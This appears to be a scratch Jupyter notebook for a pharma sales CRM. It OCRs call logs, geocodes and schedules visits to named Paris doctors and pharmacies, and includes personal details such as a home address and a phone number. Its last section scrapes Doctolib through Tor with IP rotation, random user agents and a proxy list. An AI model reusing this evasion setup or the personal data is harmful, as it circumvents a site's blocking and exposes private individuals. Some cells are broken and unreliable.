In [1]:
from IPython.core.interactiveshell import InteractiveShell
InteractiveShell.ast_node_interactivity = 'all'
from IPython.display import display, HTML, SVG
display(HTML('<style>.container { width:90% !important; }</style>'))
import os
import requests
import base64
import urllib
import time
import re
import numpy as np
import sqlite3
import dash_bootstrap_components as dbc
import dash_loading_spinners as dls
import visdcc
import dash
import pandas as pd
pd.set_option("display.date_dayfirst", True)
pd.set_option("display.expand_frame_repr", False)
pd.set_option("display.max_rows", None)
pd.set_option("display.max_columns", None)
pd.set_option("display.max_colwidth", None)
from pandas_geojson import read_geojson
from geopy.geocoders import Nominatim
from geopy import Point
from geopy.exc import GeocoderTimedOut, GeocoderUnavailable
geolocator = Nominatim(user_agent="myBestSecretAgent")
from random import randint
from bs4 import BeautifulSoup
from datetime import datetime
from flask import Flask, render_template, request, url_for, redirect
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy import create_engine, text
from sqlalchemy.orm import Session
from tqdm.notebook import tqdm, trange
from dash import Dash, html, dcc, Output, Input, State, dash_table, callback

In [ ]:
from application.dash.biocodex.functions import mean_lat, mean_lon, datatable_cols, prepare_data, build_tile_back, build_tile_front, build_modal, build_flip, join_id_adr_cdb
from application.dash.biocodex.layout import build_layout
from application.dash.biocodex.models import Identity, Adress, Connections, Cdb
from application.dash.biocodex.forms import CdbForm

from app import app
app.app_context().push()
from application.dash.biocodex.models import Pharmacy, Identity, Cdb, Connections, Adress
from app import db

# OCR

In [ ]:
from PIL import Image
import pytesseract
import re
import os

In [ ]:
path="application/data/calls/"

reg="([0-9]{4})([0-9]{2})([0-9]{2})(\.png)"

reg2 = '([0-9]{,2}:?[0-9]?[0-9]?)\s+(.*)'

calls_dict = {}

for file in ['20231127.png', '20231128.png', '20231129.png', '20231130.png', '20231201.png']:
    s=re.search(reg, file)
    date = f"{s.group(3)}/{s.group(2)}/{s.group(1)}"
    calls_dict[date] = {}

    src=f"application/data/calls/{file}"
    img = Image.open(src)
    ocr_text = pytesseract.image_to_string(img)
    ocr_list = ocr_text.split('\n')
    for i in range(len(ocr_list))[-1:0:-1]:
        if ocr_list[i] == '' or ocr_list[i] == '\x0c' or ocr_list[i] == ' ':
            del ocr_list[i]
    for j, call in enumerate(ocr_list):
        call = ocr_list[j]
        call = re.sub("‘|\{|\.|\)", "", call)
        
        s=re.search(reg2, call)
        if s:
            hour = s.group(1)
            if len(hour) == 2:
                hour=hour+":00"
            np=s.group(2)
            if ', ' in np:
                n=np.split(', ')[0]
                p=np.split(', ')[1].title()
                calls_dict[date][hour] = f'{n},{p}'
            else:
                calls_dict[date][hour] = f'{np}'

    print(date)
    for hour in calls_dict[date]:
        print(f'\t{hour}\t{calls_dict[date][hour]}')
        
print('DONE')

# CALLS_DICT

In [ ]:
june = [
    "28/06/23", "29/06/23", "30/06/23"
]
july = [
    "03/07/23", "04/07/23", "05/07/23", "06/07/23", "07/07/23",
    "10/07/23", "11/07/23", "12/07/23", "13/07/23",
    "17/07/23", "18/07/23", "19/07/23", "20/07/23", "21/07/23",
    "24/07/23", "25/07/23", "26/07/23", "27/07/23", "28/07/23"
]
august = [
    "28/08/23", "29/08/23", "30/08/23", "31/08/23"
]
september = [
    "01/09/23",
    "07/09/23", "08/09/23", 
    "11/09/23", "12/09/23", "13/09/23", "14/09/23", "15/09/23",
    "18/09/23", "19/09/23", "20/09/23", "21/09/23", "22/09/23",
    "25/09/23", "26/09/23", "27/09/23", "28/09/23", "29/09/23"
]
october = [
    "02/10/23", "03/10/23", "04/10/23", "05/10/23", "06/10/23",
    "09/10/23", "10/10/23", "11/10/23", "12/10/23", "13/10/23",
    "16/10/23", "17/10/23", "18/10/23", "19/10/23", "20/10/23",
    "23/10/23", "24/10/23", "25/10/23", "26/10/23", "27/10/23"
]
november = [
    '02/11/23', '03/11/23', 
    '06/11/23', '07/11/23', '08/11/23', '09/11/23', '10/11/23',
    '13/11/23', '14/11/23', '15/11/23', '16/11/23', '17/11/23',
    '20/11/23', '21/11/23', '22/11/23', '23/11/23', '24/11/23',
    '27/11/23', '28/11/23', '29/11/23', '30/11/23'
]
since = june + july + august + september + october + november

In [ ]:
def do_geocode(address, attempt=1, max_attempts=5):
    try:
        return geolocator.geocode(address)
    except GeocoderTimedOut:
        if attempt <= max_attempts:
            return do_geocode(address, attempt=attempt+1)
        raise
    except GeocoderUnavailable:
        if attempt <= max_attempts:
            return do_geocode(address, attempt=attempt+1)
        raise

In [ ]:
cdbs = Cdb.query.filter(Cdb.ddv!=None).all()
pharmas = Pharmacy.query.filter(Pharmacy.ddv!=None).all()
pharmas = [pharma.toDict() for pharma in pharmas]
pharmas = pd.DataFrame(pharmas)

In [ ]:
mega={}
mega['juin'] = {}
for date in june:
    mega['juin'][date] = {}
mega['juillet'] = {}
for date in july:
    mega['juillet'][date] = {}
mega['aout'] = {}
for date in august:
    mega['aout'][date] = {}
mega['septembre'] = {}
for date in september:
    mega['septembre'][date] = {}
mega['octobre'] = {}
for date in october:
    mega['octobre'][date] = {}
mega['novembre'] = {}
for date in november:
    mega['novembre'][date] = {}

In [ ]:
for cdb in cdbs:
    if cdb.ddv.year == 2023:
        if cdb.ddv.month==6:
            doc=cdb.connections[0].doc            
            mega['juin'][cdb.ddv.date().strftime('%d/%m/%y')][cdb.ddv.time().strftime('%H:%M')] = f"{doc.nom},{doc.prenom}"
        elif cdb.ddv.month==7:
            doc=cdb.connections[0].doc
            mega['juillet'][cdb.ddv.date().strftime('%d/%m/%y')][cdb.ddv.time().strftime('%H:%M')] = f"{doc.nom},{doc.prenom}"
        elif cdb.ddv.month==8:
            doc=cdb.connections[0].doc
            mega['aout'][cdb.ddv.date().strftime('%d/%m/%y')][cdb.ddv.time().strftime('%H:%M')]= f"{doc.nom},{doc.prenom}"
        elif cdb.ddv.month==9:
            doc=cdb.connections[0].doc
            mega['septembre'][cdb.ddv.date().strftime('%d/%m/%y')][cdb.ddv.time().strftime('%H:%M')] = f"{doc.nom},{doc.prenom}"
        elif cdb.ddv.month==10:
            doc=cdb.connections[0].doc
            mega['octobre'][cdb.ddv.date().strftime('%d/%m/%y')][cdb.ddv.time().strftime('%H:%M')] = f"{doc.nom},{doc.prenom}"
        elif cdb.ddv.month==11:
            doc=cdb.connections[0].doc
            mega['novembre'][cdb.ddv.date().strftime('%d/%m/%y')][cdb.ddv.time().strftime('%H:%M')] = f"{doc.nom},{doc.prenom}"

In [ ]:
for i, pharma in pharmas.iterrows():
    if pharma.ddv.year == 2023:
        if pharma.ddv.month==6:
            mega['juin'][pharma.ddv.date().strftime('%d/%m/%y')][pharma.ddv.time().strftime('%H:%M')] = f"{pharma.nom}"
        elif pharma.ddv.month==7:
            mega['juillet'][pharma.ddv.date().strftime('%d/%m/%y')][pharma.ddv.time().strftime('%H:%M')] = f"{pharma.nom}"
        elif pharma.ddv.month==8:
            mega['aout'][pharma.ddv.date().strftime('%d/%m/%y')][pharma.ddv.time().strftime('%H:%M')] = f"{pharma.nom}"
        elif pharma.ddv.month==9:
            mega['septembre'][pharma.ddv.date().strftime('%d/%m/%y')][pharma.ddv.time().strftime('%H:%M')] = f"{pharma.nom}"
        elif pharma.ddv.month==10:
            mega['octobre'][pharma.ddv.date().strftime('%d/%m/%y')][pharma.ddv.time().strftime('%H:%M')] = f"{pharma.nom}"
        elif pharma.ddv.month==11:
            mega['novembre'][pharma.ddv.date().strftime('%d/%m/%y')][pharma.ddv.time().strftime('%H:%M')] = f"{pharma.nom}"

In [ ]:
mega['septembre']['26/09/23']['10:30'] = "HADDAD,Audrey"

In [ ]:
for month in mega.keys():    
    monthd = mega[month]
    df = pd.DataFrame.from_dict(
        {
            (date,hour): monthd[date][hour] for date in monthd.keys() for hour in monthd[date].keys()
        },
        orient='index'
    )
    df.reset_index(drop=False, inplace=True)
    df['date']=[df.loc[i, 'index'][0] for i in range(len(df))]
    df['time']=[df.loc[i, 'index'][1] for i in range(len(df))]
    df.drop('index', axis=1, inplace=True)
    if len(df) != 0:
        df.columns = ['nom', 'date', 'time']
        
        for col in [ 'adr', 'zip', 'city', 'lat', 'lon']:
            df[col]=pd.Series(dtype=object)

        for i, row in df.iterrows():
            
            if "PHARM" in row['nom']:

                pharm=Pharmacy.query.filter(Pharmacy.nom == re.sub(',', '', row['nom'])).first()
                df.loc[i, 'adr'] = pharm.adr
                df.loc[i, 'zip'] = pharm.cp
                df.loc[i, 'city'] = pharm.ville
                df.loc[i, "lat"] = pharm.lat
                df.loc[i, "lon"] = pharm.lon

            elif ',' in  row['nom']:
                n= row['nom'].split(',')[0]
                p= row['nom'].split(',')[1]
                doc=Identity.query.filter((Identity.nom==n) & (Identity.prenom==p)).first()
                adr = doc.connections[0].adr
                df.loc[i, 'adr'] = adr.adr
                df.loc[i, 'zip'] = adr.cp
                df.loc[i, 'city'] = adr.ville
                df.loc[i, "lat"] = adr.lat
                df.loc[i, "lon"] = adr.lon

        df = df.sort_values(by=['date', 'time'])
        df = df[['date', 'time', 'nom', 'adr', 'zip', 'city', 'lat', 'lon']]
        df.to_csv(f'application/data/csv/{month}.csv', index=False, sep=';')

In [ ]:
juin = pd.read_csv(f"application/data/csv/juin.csv", sep=";")
# juin.to_csv(f"application/data/csv/juin.csv", sep=";", index=False)
juin

In [ ]:
juillet = pd.read_csv(f"application/data/csv/juillet.csv", sep=";")
# juin.to_csv(f"application/data/csv/juin.csv", sep=";", index=False)
# juillet

In [ ]:
juillet.loc[20, 'date'] = '26/07/23'

juillet.loc[48, 'date'] = '07/07/23'
juillet.loc[48, 'time'] = '14:00'

row00 = pd.DataFrame.from_dict({'date': '03/07/23', 'time': '11:30', 'nom': 'OGRIN,Florence'}, orient='index')

row01 = pd.DataFrame.from_dict({'date': '05/07/23', 'time': '14:00', 'nom': 'EL JABRI,Laila'}, orient='index')

row02 = pd.DataFrame.from_dict({'date': '06/07/23', 'time': '09:30', 'nom': 'GUYON,Benoit'}, orient='index')
row03 = pd.DataFrame.from_dict({'date': '06/07/23', 'time': '11:00', 'nom': 'BATON,Bruno'}, orient='index')
row04 = pd.DataFrame.from_dict({'date': '06/07/23', 'time': '11:30', 'nom': 'BENAIM,Frederic'}, orient='index')

row05 = pd.DataFrame.from_dict({'date': '07/07/23', 'time': '09:00', 'nom': 'LATTES,Frederic'}, orient='index')
row06 = pd.DataFrame.from_dict({'date': '07/07/23', 'time': '10:30', 'nom': 'VINCENT,Nicole'}, orient='index')
row07 = pd.DataFrame.from_dict({'date': '07/07/23', 'time': '13:00', 'nom': 'BAYLE GACOIN,Veronique'}, orient='index')

row09 = pd.DataFrame.from_dict({'date': '10/07/23', 'time': '14:00', 'nom': 'MAJSTER,Henri'}, orient='index')
row10 = pd.DataFrame.from_dict({'date': '10/07/23', 'time': '16:00', 'nom': 'THUAIRE,Michel'}, orient='index')

row11 = pd.DataFrame.from_dict({'date': '11/07/23', 'time': '10:00', 'nom': 'BRAKHA,Elisabeth'}, orient='index')

row12 = pd.DataFrame.from_dict({'date': '12/07/23', 'time': '12:00', 'nom': 'HAROUN,Fatima'}, orient='index')

row13 = pd.DataFrame.from_dict({'date': '13/07/23', 'time': '10:30', 'nom': 'EL FALAH EL QUADMIRY,Saloua'}, orient='index')
row14 = pd.DataFrame.from_dict({'date': '13/07/23', 'time': '12:30', 'nom': 'DUPUIS,Muriel'}, orient='index')

row15 = pd.DataFrame.from_dict({'date': '17/07/23', 'time': '09:30', 'nom': 'FARZIN,Alain'}, orient='index')

row16 = pd.DataFrame.from_dict({'date': '18/07/23', 'time': '10:00', 'nom': 'BLAISE,Benjamin'}, orient='index')

row17 = pd.DataFrame.from_dict({'date': '20/07/23', 'time': '10:30', 'nom': 'PHARMACIE VERSAILLES MIRABEAU'}, orient='index')
row18 = pd.DataFrame.from_dict({'date': '20/07/23', 'time': '14:00', 'nom': 'PHARMACIE DU BIEN ETRE'}, orient='index')

row19 = pd.DataFrame.from_dict({'date': '21/07/23', 'time': '14:00', 'nom': 'MORELLO,Dominique'}, orient='index')

row20 = pd.DataFrame.from_dict({'date': '24/07/23', 'time': '11:00', 'nom': 'PHARMACIE DUBLY'}, orient='index')

row21 = pd.DataFrame.from_dict({'date': '26/07/23', 'time': '11:30', 'nom': 'EGULLION,Marie Claude'}, orient='index')
row22 = pd.DataFrame.from_dict({'date': '26/07/23', 'time': '15:00', 'nom': 'PHARMACIE HAUSSMANN LABORDE'}, orient='index')
row23 = pd.DataFrame.from_dict({'date': '26/07/23', 'time': '15:30', 'nom': 'PHARMACIE AGOUDJIAN'}, orient='index')

row24 = pd.DataFrame.from_dict({'date': '27/07/23', 'time': '12:30', 'nom': 'BARRO LECOMTE,Francoise'}, orient='index')

row25 = pd.DataFrame.from_dict({'date': '28/07/23', 'time': '09:30', 'nom': 'NGUYEN,Marie Noelle'}, orient='index')
row26 = pd.DataFrame.from_dict({'date': '28/07/23', 'time': '10:30', 'nom': 'MARES,Michel'}, orient='index')
row27 = pd.DataFrame.from_dict({'date': '28/07/23', 'time': '11:00', 'nom': 'DOUCHET,Marc'}, orient='index')

In [ ]:
for row in [row00, row01, row02, row03, row04, row05, row06, row07, row09, row10, row11, row12, row13, row14, row15, row16, row17, row18, row19, row20, row21, row22, row23, row24, row25, row26, row27]:
    juillet = pd.concat([juillet, row.T], ignore_index=True)

In [ ]:
for i, row in juillet.iterrows():
    if i in range(49,76):
        if "PHARM" not in row['nom']:
            n= row['nom'].split(',')[0]
            p= row['nom'].split(',')[1]
            doc=Identity.query.filter((Identity.nom==n) & (Identity.prenom==p)).first()
            if doc:
                adr = doc.connections[0].adr
                juillet.loc[i, 'adr'] = adr.adr
                juillet.loc[i, 'zip'] = adr.cp
                juillet.loc[i, 'city'] = adr.ville
                juillet.loc[i, "lat"] = adr.lat
                juillet.loc[i, "lon"] = adr.lon
        else:
            pharm=Pharmacy.query.filter(Pharmacy.nom == re.sub(',', '', row['nom'])).first()
            juillet.loc[i, 'adr'] = pharm.adr
            juillet.loc[i, 'zip'] = pharm.cp
            juillet.loc[i, 'city'] = pharm.ville
            juillet.loc[i, "lat"] = pharm.lat
            juillet.loc[i, "lon"] = pharm.lon

In [ ]:
new_pds = Identity(
    nom='MORELLO',
    prenom='Dominique',
    spe="MG",
    pot=429,
    pvm=32,
    nv22=4,
    cib=4,
    dec=None
)
new_adr = Adress(
    adr="15 B AVENUE DE VILLARS",
    cp=75007,
    ville="PARIS",
    tel="01.45.51.23.31",
    uga="75INV",
)
new_cdb = Cdb(
    ddv="2023-07-21 14:00:00"
)
db.session.add(new_pds)
db.session.add(new_adr)
db.session.add(new_cdb)
db.session.commit()

In [ ]:
from sqlalchemy.orm import Session
from application.config import basedir
from dotenv import load_dotenv

load_dotenv(os.path.join(basedir, '.env'))
DATABASE_URL = os.environ.get('DATABASE_URL').replace('postgres://', 'postgresql://')
engine = create_engine(DATABASE_URL)

In [ ]:
Session=Session()

In [ ]:
Session.rollback()

In [ ]:
adresses = Adress.query.all()
for adr in adresses:
    print(adr.id)

In [ ]:
juillet

In [ ]:
for i, row in juin.iterrows():
    if "PHARM" not in row['nom']:
        n= row['nom'].split(',')[0]
        p= row['nom'].split(',')[1]
        doc=Identity.query.filter((Identity.nom==n) & (Identity.prenom==p)).first()
        cdb = doc.connections[0].cdb
        ddvs = []
        dt = pd.to_datetime(f"{row['date']} {row['time']}", dayfirst=True).strftime("%Y-%m-%d %H:%M:%S")
        ddvs.append(dt)
        cdb.ddvs = ddvs
        db.session.commit()
    else:
        pharm=Pharmacy.query.filter(Pharmacy.nom == re.sub(',', '', row['nom'])).first()
        ddvs = []
        dt = pd.to_datetime(f"{row['date']} {row['time']}", dayfirst=True).strftime("%Y-%m-%d %H:%M:%S")
        ddvs.append(dt)
        pharm.ddvs = ddvs
        db.session.commit()

In [ ]:
for i, row in juin.iterrows():
    if "PHARM" not in row['nom']:
        n= row['nom'].split(',')[0]
        p= row['nom'].split(',')[1]
        doc=Identity.query.filter((Identity.nom==n) & (Identity.prenom==p)).first()
        cdb = doc.connections[0].cdb
        ddvs = cdb.save()
        print(ddvs)
        cdb.ddvs = ddvs
        db.session.commit()
    else:
        pharm=Pharmacy.query.filter(Pharmacy.nom == re.sub(',', '', row['nom'])).first()
        ddvs = pharm.save()
        print(ddvs)
        pharm.ddvs = ddvs
        db.session.commit()

In [ ]:
for i, row in juin.iterrows():
    if "PHARM" not in row['nom']:
        n= row['nom'].split(',')[0]
        p= row['nom'].split(',')[1]
        doc=Identity.query.filter((Identity.nom==n) & (Identity.prenom==p)).first()
        cdb = doc.connections[0].cdb
        print(cdb.ddvs)

    else:
        pharm=Pharmacy.query.filter(Pharmacy.nom == re.sub(',', '', row['nom'])).first()
        print(pharm.ddvs)

In [ ]:
def get_day(date, month, dej="home"):
    
    cdb = pd.read_csv(f"/home/julien/website/application/data/csv/{month}.csv", sep=";")
    home_gps=geolocator.geocode("35 RUE MARCEL BONTEMPS 92100 BOULOGNE-BILLANCOURT")
    us_date = pd.to_datetime(date, dayfirst=True).date().strftime("%Y-%m-%d")
    
    home = {
        "type": "poi",        
        "date": date,
        "time": "07:30",
        "nom": "HOME",
        "adresse": "35 RUE MARCEL BONTEMPS",
        "cp": 92100,
        "ville": "BOULOGNE BILLANCOURT",
        "lat": home_gps.latitude,
        "lon": home_gps.longitude
    }
    lunch = {
        "type": "break",
        "date": date,
        "time": "13:15",
        "nom": "LUNCH HOME",
        "adresse": "35 RUE MARCEL BONTEMPS",
        "cp": 92100,
        "ville": "BOULOGNE BILLANCOURT",
        "lat": home_gps.latitude,
        "lon": home_gps.longitude  
    }
    diner = {
        "type": "poi",        
        "date": date,
        "time": "19:30",
        "nom": "BACK HOME",
        "adresse": "35 RUE MARCEL BONTEMPS",
        "cp": 92100,
        "ville": "BOULOGNE BILLANCOURT",
        "lat": home_gps.latitude,
        "lon": home_gps.longitude  
    }

    if dej=="home":
        df = pd.DataFrame([home, lunch, diner])
    else:
        df = pd.DataFrame([home, diner])
    
    df["lat"] = pd.Series(dtype=float, index=df.index)
    df["lon"] = pd.Series(dtype=float, index=df.index)
    
    df.columns=[
        "type", "date", "time", "id", "adr", "zip", "city", "lat", "lon" 
    ]
    
    for i, row in df.iterrows():
        local = geolocator.geocode(f"{row['adr']} {str(int(row['zip']))} {row['city']}")
        df.loc[i, "lat"] = local.latitude
        df.loc[i, "lon"] = local.longitude
        
    tournee = cdb[["date", "time",  "nom", "adr", "zip", "city", "lat", "lon"]][cdb["date"]==date].copy()
    print("CONTACTS:\t", len(tournee))
    tournee['half'] = pd.Series(dtype=str)
    
    for i, row in tournee.iterrows():

        if pd.to_datetime(row['time']).time() <= pd.to_datetime("13:00").time():
            tournee.loc[i, 'half'] = 'am'
        else:
            tournee.loc[i, 'half'] = 'pm'
        
        tournee.loc[i, "type"] = "call"
    
    if dej != "home":

        lasts = tournee[tournee['half']=="am"]
        last = lasts[lasts['time']==lasts['time'].max()]
        #print("LAST\n", last)

        if len(tournee[tournee['half']=="pm"]) > 0:
            firsts = tournee[tournee['half']=="pm"]
            first = firsts[firsts['time']==firsts['time'].min()]
            #print("FIRST\n", first)
            dej_lat=(last['lat'].values[0]+first['lat'].values[0])/2
            dej_lon=(last['lon'].values[0]+first['lon'].values[0])/2 
            tournee.loc[i+1, 'date'] = date
            tournee.loc[i+1, 'time'] = "13:15"
            tournee.loc[i+1, "type"] = "dej"
            tournee.loc[i+1, "id"] = "DEJ"
            tournee.loc[i+1, "lat"] = dej_lat
            tournee.loc[i+1, "lon"] = dej_lon
            adresse = geolocator.reverse(Point(dej_lat, dej_lon)).raw['address']
            tournee.loc[i+1, 'zip'] = adresse.get('postcode')
            tournee.loc[i+1, 'city'] = adresse.get('town') or adresse.get('city')
            tournee.loc[i+1, 'city'] = tournee.loc[i+1, 'city'].upper()
            tournee.loc[i+1, 'adr'] = adresse.get('road').upper()


        else:
            
            local = geolocator.geocode(f"{lunch['adresse']} {lunch['cp']} {lunch['ville']}")
            dej_lat = local.latitude
            dej_lon = local.longitude
            tournee.loc[i+1, 'date'] = date
            tournee.loc[i+1, 'time'] = "13:15"
            tournee.loc[i+1, "type"] = "dej"
            tournee.loc[i+1, "id"] = "DEJ"
            tournee.loc[i+1, "lat"] = dej_lat
            tournee.loc[i+1, "lon"] = dej_lon
            adresse = geolocator.reverse(Point(dej_lat, dej_lon)).raw['address']
            tournee.loc[i+1, 'zip'] = adresse.get('postcode')
            tournee.loc[i+1, 'city'] = adresse.get('town') or adresse.get('city')
            tournee.loc[i+1, 'city'] = tournee.loc[i+1, 'city'].upper()
            tournee.loc[i+1, 'adr'] = adresse.get('road').upper()

            
    day = pd.concat([tournee, df], ignore_index=True)       
    # day["ddv"] = pd.to_datetime(day["ddv"], format="mixed")
    day = day.sort_values(by=["date", "time"]).fillna("")
    day.reset_index(drop=True, inplace=True)
    day["type"] = day["type"].replace("", "call")
    
    return day

In [ ]:
cdb = pd.read_csv(f"application/data/csv/septembre.csv", sep=";")
tournee = cdb[["date", "time",  "nom", "adr", "zip", "city", "lat", "lon"]][cdb["date"]==pd.to_datetime("2023-09-26").strftime('%d/%m/%y')].copy()
tournee

In [ ]:
calls_dicto = {}
for date in since[26:44]:
    calls_dicto[date]=get_day(date, 'septembre', dej="else")

In [ ]:
calls_dicto

In [ ]:
for ts in sorted(novembre.keys()):
    if ts.month==11:
        print(ts, novembre[ts])

In [ ]:
from sqlalchemy import inspect
from sqlalchemy.orm import class_mapper
from sqlalchemy.orm.attributes import get_history

In [ ]:
def get_object_changes(obj):
    """ Given a model instance, returns dict of pending
    changes waiting for database flush/commit.

    e.g. {
        'some_field': {
            'before': *SOME-VALUE*,
            'after': *SOME-VALUE*
        },
        ...
    }
    """
    inspection = inspect(obj)
    changes = {}
    for attr in class_mapper(obj.__class__).column_attrs:
        if getattr(inspection.attrs, attr.key).history.has_changes():
            if get_history(obj, attr.key)[2]:
                before = get_history(obj, attr.key)[2].pop()
                after = getattr(obj, attr.key)
                if before != after:
                    if before or after:
                        changes[attr.key] = {'before': before, 'after': after}
    return changes

In [ ]:
doc=Identity.query.filter(Identity.nom=='EL FALAH EL QUADMIRY').first()
print(doc)

In [ ]:
get_object_changes(doc)

In [ ]:
from datetime import datetime, timedelta
import dash_datetimepicker
import dash
from dash.dependencies import Input, Output
from dash import html

In [ ]:
from random import randint

In [ ]:
randint(1,29)

In [ ]:
app = dash.Dash(__name__)

app.layout = html.Div(
    [
        html.Div(
            [
                html.H1("Range Picker"),
                dash_datetimepicker.DashDatetimepicker(
                    id="input-range",
                    utc=True,
                    locale="fr",
                ),
                html.Div(id="output-range"),
            ]
        ),
        html.Div(
            [
                html.H1("Single Picker"),
                dash_datetimepicker.DashDatetimepickerSingle(
                    id="input-single",
                    date=datetime.utcnow() - timedelta(days=1),
                    utc=True,
                ),
                html.Div(id="output-single"),
            ]
        ),
    ]
)


@app.callback(
    Output("output-range", "children"),
    [Input("input-range", "startDate"), Input("input-range", "endDate")],
)
def display_output_range(startDate, endDate):
    return "You have entered range from {} to {}".format(startDate, endDate)


@app.callback(
    Output("output-single", "children"),
    [Input("input-single", "date")],date
)
def display_output_single(date):
    return "You have entered date {}".format(date)


app.run_server(debug=True, port=8051)

# PLAYGROUND

In [ ]:
from app import app
app.app_context().push()

In [ ]:
dash.page_container

In [ ]:
con = Connections.query.filter(Connections.doc_id == 86).first()
cdb = con.cdb
identity = con.doc
adress = con.adr
row = {}
for k in ["nom", "prenom", "spe", "pot", "pvm", "nv22", "cib", "dec"]:
    row[k] = identity.__dict__[k]
for k in ["uga", "eta", "adr", "cp", "ville", "tel", "lat", "lon"]:
    row[k] = adress.__dict__[k]
for k in ["mode", "com", "ddv", "dpv", "rdv", "rec", "pk", "lun_mat", "lun_am", "mar_mat", "mar_am", "mer_mat", "mer_am", "jeu_mat", "jeu_am", "ven_mat", "ven_am"]:
    row[k] = cdb.__dict__[k]

In [ ]:
row

In [ ]:
identity.__dict__["nom"]

In [ ]:
form.populate_obj(row)

In [ ]:
form.nom.data

In [ ]:
row["nom"]

In [ ]:
build_flip(row)

In [ ]:
modal = html.Div([
        dbc.Modal(
            [
                dbc.ModalHeader(dbc.ModalTitle("Modal Example"), close_button=True),
                dbc.ModalBody("Hi, i'm a modal", id='mainBody'),
                dbc.ModalBody("", id='placeholderModal'),
                dbc.ModalFooter(
                    dbc.Button(
                        "Close",
                        id="closeButton",
                        className="ms-auto",
                        n_clicks=0,
                    )
                ),
            ],
            id="modalExample",
            centered=True,
            is_open=False,
        ),
    ])

app = Dash(external_stylesheets=[dbc.themes.BOOTSTRAP])

app.layout = html.Div([
    html.H1('Modal Example Dash App'), 
    dcc.Dropdown(['NYC', 'MTL', 'SF'], 'NYC', id='demo-dropdown'),
    modal
])

@callback(
    Output('modalExample', 'is_open'),
    Output('placeholderModal', 'children'),
    Input('demo-dropdown', 'value'),
    prevent_initial_call=True
)
def trigger_dynamic_modal(dropdown_value:str):
    return True, dropdown_value

@callback(
    Output('modalExample', 'is_open', allow_duplicate=True),
    Input('closeButton', 'n_clicks'),
    prevent_initial_call=True
)
def close_modal(_):
    return False

app.run_server(debug=True)

In [ ]:
cards

# FILTERS

In [ ]:
pd.to_datetime("01/08/2023 00:00", dayfirst=True)

In [ ]:
data_df = join_id_adr_cdb()

In [ ]:
data_df = prepare_data(data_df)

In [ ]:
now = datetime.now()
now.timestamp()

In [ ]:
data_df['ddvdata= data_df.ddv.fillna('')

In [ ]:
for i, row in data_df.iterrows():
    if row['ddv'] != '' :
        print(i, row['ddv'])

In [ ]:
data_df.ddv.loc[20].

In [ ]:
type(data_df.ddv.loc[21])

In [ ]:
    if type(row['ddv']) != float('nan'):
        ddv = unix_to_dt(row['ddv'])
        print(ddv)
        if row['ddv'] >= pd.to_datetime("01/08/2023 00:00", dayfirst=True).timestamp():
            print(ddv)

In [ ]:
int(float('nan'))

# APP CONTEXT

In [ ]:
df["nom_prenom"] = df["nom"] + ' ' + df["prenom"]
noms_options = options(df, "nom_prenom")
ugas = ["75AUT", "75PAS", "75TRO", "75ELY", "75INV", "75GRE", "75VAU", "75MNP", "75PER", "75TER", "92LEV", "92NEU"]
uga_options = [
    {'label': '75AUT', 'value': '75AUT'},
    {'label': '75ELY', 'value': '75ELY'},
    {'label': '75GRE', 'value': '75GRE'},
    {'label': '75INV', 'value': '75INV'},
    {'label': '75MNP', 'value': '75MNP'},
    {'label': '75PAS', 'value': '75PAS'},
    {'label': '75PER', 'value': '75PER'},
    {'label': '75TER', 'value': '75TER'},
    {'label': '75TRO', 'value': '75TRO'},
    {'label': '75VAU', 'value': '75VAU'},
    {'label': '92LEV', 'value': '92LEV'},
    {'label': '92NEU', 'value': '92NEU'}
]
spes = ["GY", "MG-GY", "SF", "MG", "GE", "PE", "PE-PSY", "PSY", "NE"]
doctors_spes = {
    'GY': 'gynecologue',
    'MG-GY': 'medecin-generaliste',
    'SF': 'sage-femme',
    'MG': 'medecin-generaliste',
    'GE': 'gastro-enterologue',
    'PE': 'pediatre',
    'PE-PSY': 'pedopsychiatre',
    'PSY': 'psychiatre',
    'NE': 'neurologue'
}
doctor_colors = {
    'GY': '#bd0071',
    'MG-GY': '#bd0071',
    'SF': '#bd0071',
    'MG': '#aaa',
    'GE': '#fe7600',
    'PE': '#007fff',
    'PE-PSY': '#410E66',
    'PSY': '#410E66',
    'NE': '#410e66',
}
cibles = ["HC", 1, 2, 3, 4]
sliders = []

In [ ]:
from app import app
app.app_context().push()

In [ ]:
Pharmacy.query.filter(Pharmacy.id==4).first()

In [ ]:
Identity.query.filter(Identity.nom=="ELY").filter(Identity.prenom=="Chantal").one().id

# DOCTOLIB

In [ ]:
from fake_useragent import UserAgent
from stem import Signal
from stem.control import Controller

In [ ]:
def switchIp():
    with Controller.from_port(port = 9051) as controller:
        controller.authenticate("welcome")
        controller.signal(Signal.NEWNYM)

def get_tor_session():
    session = requests.session()
    # Tor uses the 9050 port as the default socks port
    session.proxies = {
        'http':  'socks5://127.0.0.1:9050',
        'https': 'socks5://127.0.0.1:9050'
    }
    session.headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64)',
        'Referer': 'https://www.doctolib.fr/gastro-enterologue/paris/hugues-thauvin/booking/places?profile_skipped=true&specialityId=21&telehealth=false'}
    return session

def check_doctolib_profile(conn_id):    
    switchIp()
    connection = Connections.query.filter(Connections.id==conn_id).first()
    doctor = connection.doc
    prenom = doctor.prenom.lower().replace(' ', '-')
    nom = doctor.nom.lower().replace(' ', '-')
    spe=doctors_spes[doctor.spe]
    adress=connection.adr
    ville = adress.ville.lower()
    url = f"https://www.doctolib.fr/{spe}/{ville}/{prenom}-{nom}"
    session = get_tor_session()
    r = session.get(url)
    print(r.status_code)
    return url

In [ ]:
switchIp()
session=get_tor_session()
headers = {"User_Agent":UserAgent().random}
r=session.get("https://www.doctolib.fr/gastro-enterologue/paris/hugues-thauvin", headers=headers)
r.status_code

In [ ]:
for i, doc in sub_df.iterrows():
    check_doctolib_profile(doc['doc_id'])

In [ ]:
proxies = open("proxies.txt", "r").read().strip().split("\n")

def get(url, proxy): 

    """ 
    Sends a GET request to the given url using given proxy server. 
    The proxy server is used without SSL, so the URL should be HTTP. 
 

    Args: 
        url - string: HTTP URL to send the GET request with proxy 
        proxy - string: proxy server in the form of {ip}:{port} to use while sending the request 
    Returns: 
        Response of the server if the request sent successfully. Returns `None` otherwise. 
 
""" 
    try: 
        r = requests.get(url, proxies={"http": f"http://{proxy}"}) 
        if r.status_code < 400: # client-side and server-side error codes are above 400 
            return r 
        else: 
            print(r.status_code) 
    except Exception as e: 
        print(e) 

    return None


def check_proxy(proxy): 
    """ 
    Checks the proxy server by sending a GET request to httpbin. 
    Returns False if there is an error from the `get` function 
    """ 

